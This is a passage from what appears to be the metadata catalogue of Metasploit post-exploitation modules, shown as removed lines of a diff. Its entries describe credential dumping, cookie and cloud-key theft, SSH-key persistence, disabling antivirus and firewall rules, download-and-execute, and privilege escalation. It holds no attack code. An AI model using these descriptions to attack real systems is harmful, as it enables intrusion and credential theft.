- }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/hashdump": { - "name": "Linux Gather Dump Password Hashes for Linux Systems", - "fullname": "post/linux/gather/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Post Module to dump the password hashes for all users on a Linux System", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "linux/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/manageengine_password_manager_creds": { - "name": "Linux Gather ManageEngine Password Manager Pro Password Extractor", - "fullname": "post/linux/gather/manageengine_password_manager_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Travis Kaun", - "Rob Simon", - "Charles Yost", - "Christophe De La Fuente" - ], - "description": "This module gathers the encrypted passwords stored by Password Manager\n Pro and decrypt them using key materials stored in multiple\n configuration files.", - "references": [ - "URL-https://www.trustedsec.com/blog/the-curious-case-of-the-password-database/", - "URL-https://github.com/trustedsec/Zoinks/blob/main/zoinks.py" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-02 14:03:15 +0000", - "path": "/modules/post/linux/gather/manageengine_password_manager_creds.rb", - "is_install_path": true, - "ref_name": "linux/gather/manageengine_password_manager_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/mimipenguin": { - "name": "MimiPenguin", - "fullname": "post/linux/gather/mimipenguin", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-05-23", - "type": "post", - "author": [ - "huntergregal", - "bcoles ", - "Shelby Pace" - ], - "description": "This searches process memory for needles that indicate\n where cleartext passwords may be located. If any needles\n are discovered in the target process memory, collected\n strings in adjacent memory will be hashed and compared\n with password hashes found in `/etc/shadow`.", - "references": [ - "URL-https://github.com/huntergregal/mimipenguin", - "URL-https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/1772919", - "URL-https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490", - "CVE-2018-20781" - ], - "platform": "Linux", - "arch": "x86, x64, aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/linux/gather/mimipenguin.rb", - "is_install_path": true, - "ref_name": "linux/gather/mimipenguin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/mount_cifs_creds": { - "name": "Linux Gather Saved mount.cifs/mount.smbfs Credentials", - "fullname": "post/linux/gather/mount_cifs_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "Post Module to obtain credentials saved for mount.cifs/mount.smbfs in\n /etc/fstab on a Linux system.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/mount_cifs_creds.rb", - "is_install_path": true, - "ref_name": "linux/gather/mount_cifs_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/openvpn_credentials": { - "name": "OpenVPN Gather Credentials", - "fullname": "post/linux/gather/openvpn_credentials", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "rvrsh3ll", - "Roberto Soares Espreto " - ], - "description": "This module grab OpenVPN credentials from a running process\n in Linux.\n\n Note: --auth-nocache must not be set in the OpenVPN command line.", - "references": [ - "URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh" - ], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/gather/openvpn_credentials.rb", - "is_install_path": true, - "ref_name": "linux/gather/openvpn_credentials", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/phpmyadmin_credsteal": { - "name": "Phpmyadmin credentials stealer", - "fullname": "post/linux/gather/phpmyadmin_credsteal", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Chaitanya Haritash [bofheaded]", - "Dhiraj Mishra " - ], - "description": "This module gathers Phpmyadmin creds from target linux machine.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/phpmyadmin_credsteal.rb", - "is_install_path": true, - "ref_name": "linux/gather/phpmyadmin_credsteal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/pptpd_chap_secrets": { - "name": "Linux Gather PPTP VPN chap-secrets Credentials", - "fullname": "post/linux/gather/pptpd_chap_secrets", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module collects PPTP VPN information such as client, server, password,\n and IP from your target server's chap-secrets file.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/pptpd_chap_secrets.rb", - "is_install_path": true, - "ref_name": "linux/gather/pptpd_chap_secrets", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/puppet": { - "name": "Puppet Config Gather", - "fullname": "post/linux/gather/puppet", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module will grab Puppet config files, credentials, host information, and file buckets.", - "references": [ - "URL-https://github.com/Tikam02/DevOps-Guide/blob/master/Infrastructure-provisioning/Puppet/puppet-commands.md" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/gather/puppet.rb", - "is_install_path": true, - "ref_name": "linux/gather/puppet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/rancher_audit_log_leak": { - "name": "Rancher Audit Log Sensitive Information Leak", - "fullname": "post/linux/gather/rancher_audit_log_leak", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-02-08", - "type": "post", - "author": [ - "h00die" - ], - "description": "Rancher versions between 2.6.0-2.6.13, 2.7.0-2.7.9, 2.8.0-2.8.1 inclusive\n contain a vulnerability where sensitive data is leaked into the audit logs.\n Rancher Audit Logging is an opt-in feature, only deployments that have it\n enabled and have AUDIT_LEVEL set to 1 or above are impacted by this issue.\n\n Tested against rancher 2.6.0.", - "references": [ - "URL-https://github.com/rancher/rancher/security/advisories/GHSA-xfj7-qf8w-2gcr", - "URL-https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options", - "CVE-2023-22649" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/linux/gather/rancher_audit_log_leak.rb", - "is_install_path": true, - "ref_name": "linux/gather/rancher_audit_log_leak", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/tor_hiddenservices": { - "name": "Linux Gather TOR Hidden Services", - "fullname": "post/linux/gather/tor_hiddenservices", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Harvey Phillips " - ], - "description": "This module collects the hostnames name and private keys of\n any TOR Hidden Services running on the target machine. It\n will search for torrc and if found, will parse it for the\n directories of Hidden Services. However, root permissions\n are required to read them as they are owned by the user that\n TOR runs as, usually a separate account.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/tor_hiddenservices.rb", - "is_install_path": true, - "ref_name": "linux/gather/tor_hiddenservices", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/vcenter_secrets_dump": { - "name": "VMware vCenter Secrets Dump", - "fullname": "post/linux/gather/vcenter_secrets_dump", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-04-15", - "type": "post", - "author": [ - "npm ", - "Erik Wynter", - "h00die" - ], - "description": "Grab secrets and keys from the vCenter server and add them to\n loot. This module is tested against the vCenter appliance only;\n it will not work on Windows vCenter instances. It is intended to\n be run after successfully acquiring root access on a vCenter\n appliance and is useful for penetrating further into the\n environment following a vCenter exploit that results in a root\n shell.\n\n Secrets include the dcAccountDN and dcAccountPassword for\n the vCenter machine which can be used for maniuplating the SSO\n domain via standard LDAP interface; good for plugging into the\n vmware_vcenter_vmdir_ldap module or for adding new SSO admin\n users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with\n associated private keys are also plundered and can be used to\n sign forged SAML assertions for the /ui admin interface.", - "references": [ - "URL-https://github.com/shmilylty/vhost_password_decrypt", - "CVE-2022-22948", - "URL-https://pentera.io/blog/information-disclosure-in-vmware-vcenter/", - "URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-04-12 13:09:34 +0000", - "path": "/modules/post/linux/gather/vcenter_secrets_dump.rb", - "is_install_path": true, - "ref_name": "linux/gather/vcenter_secrets_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Dump", - "description": "Dump vCenter Secrets" - } - ] - }, - "post_linux/manage/adduser": { - "name": "Add a new user to the system", - "fullname": "post/linux/manage/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nick Cottrell " - ], - "description": "This command adds a new user to the system", - "references": [], - "platform": "AIX,BSD,Linux,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-10-25 19:28:23 +0000", - "path": "/modules/post/linux/manage/adduser.rb", - "is_install_path": true, - "ref_name": "linux/manage/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes" - ] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/disable_clamav": { - "name": "Disable ClamAV", - "fullname": "post/linux/manage/disable_clamav", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "DLL_Cool_J" - ], - "description": "This module will write to the ClamAV Unix socket to shutoff ClamAV.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/linux/manage/disable_clamav.rb", - "is_install_path": true, - "ref_name": "linux/manage/disable_clamav", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/dns_spoofing": { - "name": "Native DNS Spoofing module", - "fullname": "post/linux/manage/dns_spoofing", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alberto Rafael Rodriguez Iglesias " - ], - "description": "This module will be applied on a session connected to a shell. It will redirect DNS Request to remote DNS server.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/manage/dns_spoofing.rb", - "is_install_path": true, - "ref_name": "linux/manage/dns_spoofing", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/download_exec": { - "name": "Linux Manage Download and Execute", - "fullname": "post/linux/manage/download_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joshua D. Abraham " - ], - "description": "This module downloads and runs a file with bash. It first tries to use curl as\n its HTTP client and then wget if it's not found. Bash found in the PATH is used\n to execute the file.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/manage/download_exec.rb", - "is_install_path": true, - "ref_name": "linux/manage/download_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/geutebruck_post_exp": { - "name": "Geutebruck Camera Deface", - "fullname": "post/linux/manage/geutebruck_post_exp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ibrahim Ayadhi", - "Sébastien Charbonnier" - ], - "description": "This module will take an existing session on a vulnerable Geutebruck Camera\n and will allow the user to either freeze the camera and display the last\n image from the video stream, display an image on the camera, or restore\n the camera back to displaying the current feed/stream.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-09-03 12:30:12 +0000", - "path": "/modules/post/linux/manage/geutebruck_post_exp.rb", - "is_install_path": true, - "ref_name": "linux/manage/geutebruck_post_exp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "CHANGE_IMAGE", - "description": "Display an arbitrary image instead of the video stream" - }, - { - "name": "FREEZE_CAMERA", - "description": "Freeze the camera and display the last image taken from the video stream" - }, - { - "name": "RESUME_STREAM", - "description": "Resume the camera's video stream and display the current live feed" - } - ] - }, - "post_linux/manage/iptables_removal": { - "name": "IPTABLES rules removal", - "fullname": "post/linux/manage/iptables_removal", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alberto Rafael Rodriguez Iglesias " - ], - "description": "This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/manage/iptables_removal.rb", - "is_install_path": true, - "ref_name": "linux/manage/iptables_removal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/pseudo_shell": { - "name": "Pseudo-Shell Post-Exploitation Module", - "fullname": "post/linux/manage/pseudo_shell", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alberto Rafael Rodriguez Iglesias " - ], - "description": "This module will run a Pseudo-Shell.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/manage/pseudo_shell.rb", - "is_install_path": true, - "ref_name": "linux/manage/pseudo_shell", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/sshkey_persistence": { - "name": "SSH Key Persistence", - "fullname": "post/linux/manage/sshkey_persistence", - "aliases": [], - "rank": 600, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die " - ], - "description": "This module will add an SSH key to a specified user (or all), to allow\n remote login via SSH at any time.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/manage/sshkey_persistence.rb", - "is_install_path": true, - "ref_name": "linux/manage/sshkey_persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/escalate/aws_create_iam_user": { - "name": "Create an AWS IAM User", - "fullname": "post/multi/escalate/aws_create_iam_user", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Godinez ", - "Jon Hart " - ], - "description": "This module will attempt to create an AWS (Amazon Web Services) IAM\n (Identity and Access Management) user with Admin privileges.", - "references": [ - "URL-https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf" - ], - "platform": "Unix", - "arch": "", - "rport": 443, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/escalate/aws_create_iam_user.rb", - "is_install_path": true, - "ref_name": "multi/escalate/aws_create_iam_user", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/escalate/cups_root_file_read": { - "name": "CUPS 1.6.1 Root File Read", - "fullname": "post/multi/escalate/cups_root_file_read", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-20", - "type": "post", - "author": [ - "Jann Horn", - "joev " - ], - "description": "This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.\n CUPS allows members of the lpadmin group to make changes to the cupsd.conf\n configuration, which can specify an Error Log path. When the user visits the\n Error Log page in the web interface, the cupsd daemon (running with setuid root)\n reads the Error Log path and echoes it as plaintext.\n\n This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4\n as long as the session is in the lpadmin group.\n\n Warning: if the user has set up a custom path to the CUPS error log,\n this module might fail to reset that path correctly. You can specify\n a custom error log path with the ERROR_LOG datastore option.", - "references": [ - "CVE-2012-5519", - "OSVDB-87635", - "URL-https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791" - ], - "platform": "Linux,OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/escalate/cups_root_file_read.rb", - "is_install_path": true, - "ref_name": "multi/escalate/cups_root_file_read", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/escalate/metasploit_pcaplog": { - "name": "Multi Escalate Metasploit pcap_log Local Privilege Escalation", - "fullname": "post/multi/escalate/metasploit_pcaplog", - "aliases": [], - "rank": 0, - "disclosure_date": "2012-07-16", - "type": "post", - "author": [ - "0a29406d9794e4f9b30b3c5d6702c708" - ], - "description": "Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,\n creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these\n filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.\n This, and all the other packets, are appended to /etc/passwd.\n\n Successful exploitation results in the creation of a new superuser account.\n\n This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap\n files and truncate /etc/passwd. Note that if this module fails, you can potentially induce\n a permanent DoS on the target by corrupting the /etc/passwd file.", - "references": [ - "BID-54472", - "URL-http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html", - "URL-https://community.rapid7.com/docs/DOC-1946" - ], - "platform": "BSD,Linux,Unix", - "arch": "", - "rport": 2940, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/escalate/metasploit_pcaplog.rb", - "is_install_path": true, - "ref_name": "multi/escalate/metasploit_pcaplog", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/apple_ios_backup": { - "name": "Windows Gather Apple iOS MobileSync Backup File Collection", - "fullname": "post/multi/gather/apple_ios_backup", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "hdm ", - "bannedit " - ], - "description": "This module will collect sensitive files from any on-disk iOS device backups", - "references": [], - "platform": "OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/apple_ios_backup.rb", - "is_install_path": true, - "ref_name": "multi/gather/apple_ios_backup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/aws_ec2_instance_metadata": { - "name": "Gather AWS EC2 Instance Metadata", - "fullname": "post/multi/gather/aws_ec2_instance_metadata", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "This module will attempt to connect to the AWS EC2 instance metadata service\n and crawl and collect all metadata known about the session'd host.", - "references": [ - "URL-http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html" - ], - "platform": "Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/aws_ec2_instance_metadata.rb", - "is_install_path": true, - "ref_name": "multi/gather/aws_ec2_instance_metadata", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/aws_keys": { - "name": "UNIX Gather AWS Keys", - "fullname": "post/multi/gather/aws_keys", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "This module will attempt to read AWS configuration files\n (.aws/config, .aws//credentials and .s3cfg) for users discovered\n on the session'd system and extract AWS keys from within.", - "references": [ - "URL-http://s3tools.org/kb/item14.htm", - "URL-http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html#cli-config-files" - ], - "platform": "BSD,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/aws_keys.rb", - "is_install_path": true, - "ref_name": "multi/gather/aws_keys", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/azure_cli_creds": { - "name": "Azure CLI Credentials Gatherer", - "fullname": "post/multi/gather/azure_cli_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "James Otten ", - "h00die" - ], - "description": "This module will collect the Azure CLI 2.0+ (az cli) settings files\n for all users on a given target. These configuration files contain\n JWT tokens used to authenticate users and other subscription information.\n Once tokens are stolen from one host, they can be used to impersonate\n the user from a different host.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-06-27 10:45:05 +0000", - "path": "/modules/post/multi/gather/azure_cli_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/azure_cli_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/check_malware": { - "name": "Multi Gather Malware Verifier", - "fullname": "post/multi/gather/check_malware", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will check a file for malware on VirusTotal based on the checksum.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/check_malware.rb", - "is_install_path": true, - "ref_name": "multi/gather/check_malware", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/chrome_cookies": { - "name": "Chrome Gather Cookies", - "fullname": "post/multi/gather/chrome_cookies", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mangopdf " - ], - "description": "Read all cookies from the Default Chrome profile of the target user.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/chrome_cookies.rb", - "is_install_path": true, - "ref_name": "multi/gather/chrome_cookies", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/dbeaver": { - "name": "Gather Dbeaver Passwords", - "fullname": "post/multi/gather/dbeaver", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team " - ], - "description": "This module will determine if Dbeaver is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n where possible.", - "references": [ - "URL-https://blog.kali-team.cn/Metasploit-dbeaver-9f42e26241c94ba785dce5f1e69697aa" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/dbeaver.rb", - "is_install_path": true, - "ref_name": "multi/gather/dbeaver", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/dbvis_enum": { - "name": "Multi Gather DbVisualizer Connections Settings", - "fullname": "post/multi/gather/dbvis_enum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "David Bloom" - ], - "description": "DbVisualizer stores the user database configuration in dbvis.xml.\n This module retrieves the connections settings from this file and decrypts 